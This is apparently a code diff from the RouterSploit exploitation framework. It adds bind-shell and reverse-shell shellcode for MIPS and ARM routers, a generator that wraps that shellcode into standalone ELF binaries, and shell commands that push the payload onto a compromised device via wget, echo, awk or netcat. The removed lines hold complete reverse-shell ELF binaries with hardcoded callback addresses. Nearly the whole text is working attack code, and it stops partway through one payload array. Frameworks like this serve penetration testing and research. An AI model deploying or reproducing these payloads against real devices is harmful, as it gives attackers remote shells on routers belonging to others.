"\x4e\x10\x02\x24" + # li v0,4174 ( __NR_listen )
"\x0c\x01\x01\x01" + # syscall
"\x25\x20\x10\x02" + # or a0,s0,s0
"\xff\xff\x05\x28" + # slti a1,zero,-1
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x48\x10\x02\x24" + # li v0,4168 ( __NR_accept )
"\x0c\x01\x01\x01" + # syscall
"\xff\xff\xa2\xaf" + # sw v0,-1(sp) # socket
"\xfd\xff\x11\x24" + # li s1,-3
"\x27\x88\x20\x02" + # nor s1,s1,zero
"\xff\xff\xa4\x8f" + # lw a0,-1(sp)
"\x21\x28\x20\x02" + # move a1,s1 # dup2_loop
"\xdf\x0f\x02\x24" + # li v0,4063 ( __NR_dup2 )
"\x0c\x01\x01\x01" + # syscall 0x40404
"\xff\xff\x10\x24" + # li s0,-1
"\xff\xff\x31\x22" + # addi s1,s1,-1
"\xfa\xff\x30\x16" + # bne s1,s0 <dup2_loop>
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x62\x69\x0f\x3c" + # lui t7,0x2f2f "bi"
"\x2f\x2f\xef\x35" + # ori t7,t7,0x6269 "//"
"\xec\xff\xaf\xaf" + # sw t7,-20(sp)
"\x73\x68\x0e\x3c" + # lui t6,0x6e2f "sh"
"\x6e\x2f\xce\x35" + # ori t6,t6,0x7368 "n/"
"\xf0\xff\xae\xaf" + # sw t6,-16(sp)
"\xf4\xff\xa0\xaf" + # sw zero,-12(sp)
"\xec\xff\xa4\x27" + # addiu a0,sp,-20
"\xf8\xff\xa4\xaf" + # sw a0,-8(sp)
"\xfc\xff\xa0\xaf" + # sw zero,-4(sp)
"\xf8\xff\xa5\x27" + # addiu a1,sp,-8
"\xab\x0f\x02\x24" + # li v0,4011 ( __NR_execve )
"\x0c\x01\x01\x01" # syscall 0x40404
)
routersploit/modules/payloads/mipsle_reverse_tcp.py 0 → 100644
from routersploit import (
exploits,
payloads,
validators,
)
class Exploit(payloads.Payload):
__info__ = {
'name': 'MIPSLE Reverse TCP',
'authors': [
],
'description': '',
'references': [
],
'devices': [
],
}
architecture = "mipsle"
target = exploits.Option('', 'Reverse IP', validators=validators.ipv4)
port = exploits.Option(5555, 'Reverse TCP port', validators=validators.integer)
def generate(self):
reverse_ip = self.convert_ip(self.target)
reverse_port = self.convert_port(self.port)
self.payload = (
"\xff\xff\x04\x28" + # slti a0,zero,-1
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\x11\x11\x04\x28" + # slti a0,zero,4369
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xfd\xff\x0c\x24" + # li t4,-3
"\x27\x20\x80\x01" + # nor a0,t4,zero
"\xa6\x0f\x02\x24" + # li v0,4006
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xfd\xff\x0c\x24" + # li t4,-3
"\x27\x20\x80\x01" + # nor a0,t4,zero
"\x27\x28\x80\x01" + # nor a1,t4,zero
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\x57\x10\x02\x24" + # li v0,4183
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xff\xff\x44\x30" + # andi a0,v0,0xffff
"\xc9\x0f\x02\x24" + # li v0,4041
"\x0c\x09\x09\x01" + # syscall 0x42424
"\xc9\x0f\x02\x24" + # li v0,4041
"\x0c\x09\x09\x01" + # syscall 0x42424
reverse_port + "\x05\x3c" + # "\x7a\x69" lui a1,0x697a
"\x02\x00\xa5\x34" + # ori a1,a1,0x2
"\xf8\xff\xa5\xaf" + # sw a1,-8(sp)
reverse_ip[2:] + "\x05\x3c" + # "\x00\x01" lui a1,0x100
reverse_ip[:2] + "\xa5\x34" + # "\x7f\x00" ori a1,a1,0x7f
"\xfc\xff\xa5\xaf" + # sw a1,-4(sp)
"\xf8\xff\xa5\x23" + # addi a1,sp,-8
"\xef\xff\x0c\x24" + # li t4,-17
"\x27\x30\x80\x01" + # nor a2,t4,zero
"\x4a\x10\x02\x24" + # li v0,4170
"\x0c\x09\x09\x01" + # syscall 0x42424
"\x62\x69\x08\x3c" + # lui t0,0x6962
"\x2f\x2f\x08\x35" + # ori t0,t0,0x2f2f
"\xec\xff\xa8\xaf" + # sw t0,-20(sp)
"\x73\x68\x08\x3c" + # lui t0,0x6873
"\x6e\x2f\x08\x35" + # ori t0,t0,0x2f6e
"\xf0\xff\xa8\xaf" + # sw t0,-16(sp)
"\xff\xff\x07\x28" + # slti a3,zero,-1
"\xf4\xff\xa7\xaf" + # sw a3,-12(sp)
"\xfc\xff\xa7\xaf" + # sw a3,-4(sp)
"\xec\xff\xa4\x23" + # addi a0,sp,-20
"\xec\xff\xa8\x23" + # addi t0,sp,-20
"\xf8\xff\xa8\xaf" + # sw t0,-8(sp)
"\xf8\xff\xa5\x23" + # addi a1,sp,-8
"\xec\xff\xbd\x27" + # addiu sp,sp,-20
"\xff\xff\x06\x28" + # slti a2,zero,-1
"\xab\x0f\x02\x24" + # li v0,4011
"\x0c\x09\x09\x01" # syscall 0x42424
)
routersploit/payloads.py 0 → 100644
#!/usr/bin/env python
from struct import pack
import exploits
from utils import (
print_success,
print_status,
print_info,
print_error,
random_text
)
ARCH_ELF_HEADERS = {
"armle": ("\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x28\x00\x01\x00\x00\x00\x54\x80\x00\x00\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
"\x00\x80\x00\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
"\x00\x10\x00\x00"),
"mipsbe": ("\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00\x00\x34"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00"
"\x00\x40\x00\x00\xde\xad\xbe\xef\xde\xad\xbe\xef\x00\x00\x00\x07"
"\x00\x00\x10\x00"),
"mipsle": ("\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00"
"\x00\x00\x40\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
"\x00\x10\x00\x00")
}
class Payload(exploits.Exploit):
output = exploits.Option('python', 'Output type: elf/python')
filepath = exploits.Option("/tmp/{}".format(random_text(8)), 'Output file to write')
def __init__(self):
if self.architecture == "armle":
self.bigendian = False
self.header = ARCH_ELF_HEADERS['armle']
elif self.architecture == "mipsbe":
self.bigendian = True
self.header = ARCH_ELF_HEADERS['mipsbe']
elif self.architecture == "mipsle":
self.bigendian = False
self.header = ARCH_ELF_HEADERS['mipsle']
else:
print_error("Define architecture. Supported architectures: armle, mipsbe, mipsle")
return None
def run(self):
print_status("Generating payload")
self.generate()
if self.output == "elf":
with open(self.filepath, 'w+') as f:
print_status("Building ELF payload")
content = self.generate_elf()
print_success("Saving file {}".format(self.filepath))
f.write(content)
elif self.output == "python":
print_success("Building payload for python")
content = self.generate_python()
print_info(content)
def convert_ip(self, addr):
res = ""
for i in addr.split("."):
res += chr(int(i))
return res
def convert_port(self, p):
res = "%.4x" % int(p)
return res.decode('hex')
def generate_elf(self):
elf = self.header + self.payload
if self.bigendian:
p_filesz = pack(">L", len(elf))
p_memsz = pack(">L", len(elf) + len(self.payload))
else:
p_filesz = pack("<L", len(elf))
p_memsz = pack("<L", len(elf) + len(self.payload))
content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
return content
def generate_python(self):
res = "payload = (\n \""
for idx, x in enumerate(self.payload):
if idx % 15 == 0 and idx != 0:
res += "\"\n \""
res += "\\x%02x" % ord(x)
res += "\"\n)"
return res
routersploit/shell.py
...@@ -3,8 +3,10 @@ import telnetlib ...@@ -3,8 +3,10 @@ import telnetlib
import SimpleHTTPServer import SimpleHTTPServer
import BaseHTTPServer import BaseHTTPServer
import threading import threading
import time
from printer import printer_queue from printer import printer_queue
from routersploit import validators
from routersploit.utils import ( from routersploit.utils import (
print_info, print_info,
...@@ -14,6 +16,47 @@ from routersploit.utils import ( ...@@ -14,6 +16,47 @@ from routersploit.utils import (
random_text, random_text,
) )
import routersploit.modules.payloads as payloads
def bind_tcp(arch, rport):
print_status("Generating bind shell binary")
if arch == 'armle':
payload = payloads.armle_bind_tcp.Exploit()
elif arch == 'mipsle':
payload = payloads.mipsle_bind_tcp.Exploit()
elif arch == 'mipsbe':
payload = payloads.mipsbe_bind_tcp.Exploit()
else:
print_error("Platform not supported")
return None
payload.port = rport
payload.generate()
return payload.generate_elf()
def reverse_tcp(arch, lhost, lport):
print_status("Generating reverse shell binary")
if arch == 'armle':
payload = payloads.armle_reverse_tcp.Exploit()
elif arch == 'mipsle':
payload = payloads.mipsle_reverse_tcp.Exploit()
elif arch == 'mipsbe':
payload = payloads.mipsbe_reverse_tcp.Exploit()
else:
print_error("Platform not supported")
return None
payload.target = lhost
payload.port = lport
payload.generate()
return payload.generate_elf()
def shell(exploit, architecture="", method="", **params): def shell(exploit, architecture="", method="", **params):
while 1: while 1:
...@@ -26,25 +69,40 @@ def shell(exploit, architecture="", method="", **params): ...@@ -26,25 +69,40 @@ def shell(exploit, architecture="", method="", **params):
return return
c = cmd.split() c = cmd.split()
if len(c) and c[0] == "reverse_tcp": if len(c) and (c[0] == "bind_tcp" or c[0] == "reverse_tcp"):
if len(c) == 3: options = {}
lhost = c[1] if c[0] == "bind_tcp":
lport = c[2] try:
options['technique'] = "bind_tcp"
revshell = reverse_shell(exploit, architecture, lhost, lport) options['rhost'] = validators.ipv4(exploit.target)
options['rport'] = int(c[1])
if method == "wget": options['lhost'] = c[2]
revshell.wget(binary=params['binary'], location=params['location']) options['lport'] = int(c[3])
elif method == "echo": except:
revshell.echo(binary=params['binary'], location=params['location']) print_error("bind_tcp <rport> <lhost> <lport>")
elif method == "awk":
revshell.awk(binary=params['binary']) payload = bind_tcp(architecture, options['rport'])
elif method == "netcat":
revshell.netcat(binary=params['binary'], shell=params['shell']) elif c[0] == "reverse_tcp":
else: try:
print_error("Reverse shell is not available") options['technique'] = "reverse_tcp"
else: options['lhost'] = c[1]
print_error("reverse_tcp <reverse ip> <port>") options['lport'] = int(c[2])
except:
print_error("reverse_tcp <lhost> <lport>")
payload = reverse_tcp(architecture, options['lhost'], options['lport'])
communication = Communication(exploit, payload, options)
if method == "wget":
communication.wget(binary=params['binary'], location=params['location'])
elif method == "echo":
communication.echo(binary=params['binary'], location=params['location'])
elif method == "awk":
communication.awk(binary=params['binary'])
elif method == "netcat":
communication.netcat(binary=params['binary'], shell=params['shell'])
else: else:
print_info(exploit.execute(cmd)) print_info(exploit.execute(cmd))
...@@ -70,333 +128,32 @@ class HttpServer(BaseHTTPServer.HTTPServer): ...@@ -70,333 +128,32 @@ class HttpServer(BaseHTTPServer.HTTPServer):
self.handle_request() self.handle_request()
class reverse_shell(object): class Communication(object):
arm = ( def __init__(self, exploit, payload, options):
# elf binary
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00"
"\x00\x00\x74\x80\x00\x00\x34\x00\x00\x00\x70\x01\x00\x00\x02\x02\x00\x05\x34\x00\x20\x00"
"\x02\x00\x28\x00\x07\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80"
"\x00\x00\x18\x01\x00\x00\x18\x01\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00"
"\x18\x01\x00\x00\x18\x01\x01\x00\x18\x01\x01\x00\x0b\x00\x00\x00\x0b\x00\x00\x00\x06\x00"
"\x00\x00\x00\x80\x00\x00"
# <_start>:
"\x84\x70\x9f\xe5" # ldr r7, [pc, #132]
"\x02\x00\xa0\xe3" # mov r0, #2
"\x01\x10\xa0\xe3" # mov r1, #1
"\x00\x20\xa0\xe3" # mov r2, #0
"\x00\x00\x00\xef" # svc 0x00000000
"\x00\x60\xa0\xe1" # mov r6, r0
"\x70\x50\x9f\xe5" # ldr r5, [pc, #112] ; 8104 <loop+0x50>
"\x04\x50\x2d\xe5" # push {r5} ; (str r5, [sp, #-4]!)
"\x6c\x50\x9f\xe5" # ldr r5, [pc, #108] ; 8108 <loop+0x54>
"\x04\x50\x2d\xe5" # push {r5} ; (str r5, [sp, #-4]!)
"\x0d\x10\xa0\xe1" # mov r1, sp
"\x10\x20\xa0\xe3" # mov r2, #16
"\x60\x70\x9f\xe5" # ldr r7, [pc, #96] ; 810c <loop+0x58>
"\x00\x00\x00\xef" # svc 0x00000000
"\x06\x00\xa0\xe1" # mov r0, r6
"\x03\x10\xa0\xe3" # mov r1, #3
# <loop>:
"\x01\x10\x51\xe2" # subs r1, r1, #1
"\x3f\x70\xa0\xe3" # mov r7, #63 ; 0x3f
"\x00\x00\x00\xef" # svc 0x00000000
"\xfb\xff\xff\x1a" # bne 80b4 <loop>
"\x44\x00\x9f\xe5" # ldr r0, [pc, #68] ; 8110 <loop+0x5c>
"\x00\x10\xa0\xe1" # mov r1, r0
"\x02\x20\x22\xe0" # eor r2, r2, r2
"\x04\x20\x2d\xe5" # push {r2} ; (str r2, [sp, #-4]!)
"\x38\x10\x9f\xe5" # ldr r1, [pc, #56] ; 8114 <loop+0x60>
"\x04\x10\x2d\xe5" # push {r1} ; (str r1, [sp, #-4]!)
"\x0d\x10\xa0\xe1" # mov r1, sp
"\x0b\x70\xa0\xe3" # mov r7, #11
"\x00\x00\x00\xef" # svc 0x00000000
"\x00\x00\xa0\xe3" # mov r0, #0
"\x01\x70\xa0\xe3" # mov r7, #1
"\x00\x00\x00\xef" # svc 0x00000000
"\x01\x70\xa0\xe3" # mov r7, #1
"\x00\x00\xa0\xe3" # mov r0, #0
"\x00\x00\x00\xef" # svc 0x00000000
"\x19\x01\x00\x00" # .word 0x00000119
"\x7f\x00\x00\x01" # .word 0x0100007f
"\x02\x00\x11\x5c" # .word 0x5c110002
"\x1b\x01\x00\x00" # .word 0x0000011b
"\x18\x01\x01\x00" # .word 0x00010118
"\x20\x01\x01\x00" # .word 0x00010120
# elf binary
"\x2f\x62\x69\x6e\x2f\x73\x68\x00\x73\x68\x00\x41\x13\x00\x00\x00\x61\x65\x61\x62\x69\x00"
"\x01\x09\x00\x00\x00\x06\x01\x08\x01\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72"
"\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x64"
"\x61\x74\x61\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00"
"\x01\x00\x00\x00\x06\x00\x00\x00\x74\x80\x00\x00\x74\x00\x00\x00\xa4\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x18\x01\x01\x00\x18\x01\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x27\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00"
"\x00\x00\x00\x00\x23\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x37\x01\x00\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\x02\x00\x00"
"\x40\x01\x00\x00\x06\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00"
"\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x03\x00\x00\x70\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x80\x00\x00\x00\x00\x00\x00"
"\x03\x00\x01\x00\x00\x00\x00\x00\x18\x01\x01\x00\x00\x00\x00\x00\x03\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x04\x00\xf1\xff\x0f\x00\x00\x00\x18\x01\x01\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x16\x00\x00\x00\x20\x01\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x19\x00\x00\x00"
"\x74\x80\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x1c\x00\x00\x00\xb4\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x21\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x21\x00\x00\x00\x18\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x24\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00"
"\x10\x00\x02\x00\x2f\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x3d\x00"
"\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x49\x00\x00\x00\x74\x80\x00\x00"
"\x00\x00\x00\x00\x10\x00\x01\x00\x50\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00"
"\x02\x00\x5c\x00\x00\x00\x24\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x64\x00\x00\x00"
"\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x6b\x00\x00\x00\x24\x01\x01\x00\x00\x00"
"\x00\x00\x10\x00\x02\x00\x00\x72\x65\x76\x65\x72\x73\x65\x5f\x74\x63\x70\x2e\x6f\x00\x62"
"\x69\x6e\x61\x72\x79\x00\x73\x68\x00\x24\x61\x00\x6c\x6f\x6f\x70\x00\x24\x64\x00\x5f\x62"
"\x73\x73\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x5f\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x5f\x5f"
"\x00\x5f\x5f\x62\x73\x73\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f"
"\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x65\x64\x61"
"\x74\x61\x00\x5f\x65\x6e\x64\x00"
)
mipsel = (
# elf binary
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00"
"\x00\x00\x90\x00\x40\x00\x34\x00\x00\x00\x8c\x01\x00\x00\x00\x10\x00\x50\x34\x00\x20\x00"
"\x02\x00\x28\x00\x06\x00\x03\x00\x00\x00\x00\x70\x74\x00\x00\x00\x74\x00\x40\x00\x74\x00"
"\x40\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x60\x01\x00\x00\x60\x01\x00\x00\x05\x00"
"\x00\x00\x00\x00\x01\x00\xf4\x11\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x50\x81\x41\x00\x00\x00\x00\x00"
# <_ftext>:
"\xff\xff\x04\x28" # slti a0,zero,-1
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\x11\x11\x04\x28" # slti a0,zero,4369
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\xfd\xff\x0c\x24" # li t4,-3
"\x27\x20\x80\x01" # nor a0,t4,zero
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\xfd\xff\x0c\x24" # li t4,-3
"\x27\x20\x80\x01" # nor a0,t4,zero
"\x27\x28\x80\x01" # nor a1,t4,zero
"\xff\xff\x06\x28" # slti a2,zero,-1
"\x57\x10\x02\x24" # li v0,4183
"\x0c\x09\x09\x01" # syscall 0x42424
"\xff\xff\x44\x30" # andi a0,v0,0xffff
"\xc9\x0f\x02\x24" # li v0,4041
"\x0c\x09\x09\x01" # syscall 0x42424
"\xc9\x0f\x02\x24" # li v0,4041
"\x0c\x09\x09\x01" # syscall 0x42424
"\x7a\x69\x05\x3c" # lui a1,0x697a
"\x02\x00\xa5\x34" # ori a1,a1,0x2
"\xf8\xff\xa5\xaf" # sw a1,-8(sp)
"\x00\x01\x05\x3c" # lui a1,0x100
"\x7f\x00\xa5\x34" # ori a1,a1,0x7f
"\xfc\xff\xa5\xaf" # sw a1,-4(sp)
"\xf8\xff\xa5\x23" # addi a1,sp,-8
"\xef\xff\x0c\x24" # li t4,-17
"\x27\x30\x80\x01" # nor a2,t4,zero
"\x4a\x10\x02\x24" # li v0,4170
"\x0c\x09\x09\x01" # syscall 0x42424
"\x62\x69\x08\x3c" # lui t0,0x6962
"\x2f\x2f\x08\x35" # ori t0,t0,0x2f2f
"\xec\xff\xa8\xaf" # sw t0,-20(sp)
"\x73\x68\x08\x3c" # lui t0,0x6873
"\x6e\x2f\x08\x35" # ori t0,t0,0x2f6e
"\xf0\xff\xa8\xaf" # sw t0,-16(sp)
"\xff\xff\x07\x28" # slti a3,zero,-1
"\xf4\xff\xa7\xaf" # sw a3,-12(sp)
"\xfc\xff\xa7\xaf" # sw a3,-4(sp)
"\xec\xff\xa4\x23" # addi a0,sp,-20
"\xec\xff\xa8\x23" # addi t0,sp,-20
"\xf8\xff\xa8\xaf" # sw t0,-8(sp)
"\xf8\xff\xa5\x23" # addi a1,sp,-8
"\xec\xff\xbd\x27" # addiu sp,sp,-20
"\xff\xff\x06\x28" # slti a2,zero,-1
"\xab\x0f\x02\x24" # li v0,4011
"\x0c\x09\x09\x01" # syscall 0x42424
# elf binary
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e"
"\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x72\x65\x67\x69"
"\x6e\x66\x6f\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x06\x00\x00\x70\x02\x00\x00\x00\x74\x00"
"\x40\x00\x74\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00"
"\x18\x00\x00\x00\x24\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x90\x00\x40\x00\x90\x00"
"\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
"\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x2a\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7c\x02\x00\x00\xc0\x00\x00\x00\x05\x00"
"\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x03\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x74\x00\x40\x00\x00\x00\x00\x00\x03\x00\x01\x00\x00\x00"
"\x00\x00\x90\x00\x40\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x60\x01\x41\x00"
"\x00\x00\x00\x00\x10\x00\x02\x00\x08\x00\x00\x00\x50\x81\x41\x00\x00\x00\x00\x00\x10\x00"
"\xf1\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x14\x00\x00\x00"
"\x90\x00\x40\x00\x00\x00\x00\x00\x10\x00\x02\x00\x1b\x00\x00\x00\x90\x00\x40\x00\x00\x00"
"\x00\x00\x11\x00\x02\x00\x22\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff"
"\x2e\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff\x35\x00\x00\x00\x60\x01"
"\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff\x3a\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00"
"\x10\x00\xf1\xff\x00\x5f\x66\x64\x61\x74\x61\x00\x5f\x67\x70\x00\x5f\x5f\x73\x74\x61\x72"
"\x74\x00\x5f\x66\x74\x65\x78\x74\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x62\x73\x73\x5f"
"\x73\x74\x61\x72\x74\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x66\x62\x73"
"\x73\x00"
)
mips = (
# elf binary
"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00"
"\x00\x01\x00\x40\x00\x90\x00\x00\x00\x34\x00\x00\x01\x8c\x50\x00\x10\x00\x00\x34\x00\x20"
"\x00\x02\x00\x28\x00\x06\x00\x03\x70\x00\x00\x00\x00\x00\x00\x74\x00\x40\x00\x74\x00\x40"
"\x00\x74\x00\x00\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01"
"\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x01\x60\x00\x00\x01\x60\x00\x00"
"\x00\x05\x00\x01\x00\x00\x20\x00\x11\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x41\x81\x50\x00\x00\x00\x00"
# <_ftext>:
"\x28\x04\xff\xff" # slti a0,zero,-1
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x28\x04\x11\x11" # slti a0,zero,4369
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x0c\xff\xfd" # li t4,-3
"\x01\x80\x20\x27" # nor a0,t4,zero
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x0c\xff\xfd" # li t4,-3
"\x01\x80\x20\x27" # nor a0,t4,zero
"\x01\x80\x28\x27" # nor a1,t4,zero
"\x28\x06\xff\xff" # slti a2,zero,-1
"\x24\x02\x10\x57" # li v0,4183
"\x01\x09\x09\x0c" # syscall 0x42424
"\x30\x44\xff\xff" # andi a0,v0,0xffff
"\x24\x02\x0f\xc9" # li v0,4041
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x02\x0f\xc9" # li v0,4041
"\x01\x09\x09\x0c" # syscall 0x42424
"\x3c\x05\x00\x02" # lui a1,0x2
"\x34\xa5\x7a\x69" # ori a1,a1,0x7a69
"\xaf\xa5\xff\xf8" # sw a1,-8(sp)
"\x3c\x05\xc0\xa8" # lui a1,0xc0a8
"\x34\xa5\x01\x37" # ori a1,a1,0x137
"\xaf\xa5\xff\xfc" # sw a1,-4(sp)
"\x23\xa5\xff\xf8" # addi a1,sp,-8
"\x24\x0c\xff\xef" # li t4,-17
"\x01\x80\x30\x27" # nor a2,t4,zero
"\x24\x02\x10\x4a" # li v0,4170
"\x01\x09\x09\x0c" # syscall 0x42424
"\x3c\x08\x2f\x2f" # lui t0,0x2f2f
"\x35\x08\x62\x69" # ori t0,t0,0x6269
"\xaf\xa8\xff\xec" # sw t0,-20(sp)
